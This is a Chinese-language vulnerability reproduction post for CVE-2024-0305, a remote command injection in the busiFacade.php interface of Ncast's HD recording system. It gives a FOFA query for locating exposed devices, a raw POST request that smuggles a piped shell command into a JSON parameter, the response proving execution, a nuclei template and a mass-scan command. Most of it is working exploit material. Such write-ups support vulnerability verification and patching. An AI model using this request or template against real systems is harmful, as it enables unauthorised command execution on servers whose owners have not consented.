[漏洞复现]CVE-2024-0305

app="Ncast-产品" && title=="高清智能录播系统"

POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Date: Fri, 12 Jan 2024 05:41:32 GMTServer: nginx/1.9.5X-Powered-By: PHP/5.6.14$#str#$hello

id: CVE-2024-0305info:  name: Ncast盈可视高清智能录播系统busiFacade RCE漏洞  author: fgz  severity: critical  description: Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统，旨在提供高质量，高清定制的录播功能。该系统/classes/common/busiFacade.php接口存在RCE漏洞，攻击者可以构造恶意命令远控服务器。  metadata:    max-request: 1    fofa-query: app="Ncast-产品" && title=="高清智能录播系统"    verified: truerequests:  - raw:      - |+        POST /classes/common/busiFacade.php HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: gzip, deflate        Content-Type: application/x-www-form-urlencoded; charset=UTF-8        X-Requested-With: XMLHttpRequest        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept: */*        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0        %7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20{{randstr}}%22%5D%7D    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, '{{randstr}}')"

nuclei.exe -l data/Ncast.txt -t mypoc/其他/CVE-2024-0305.yaml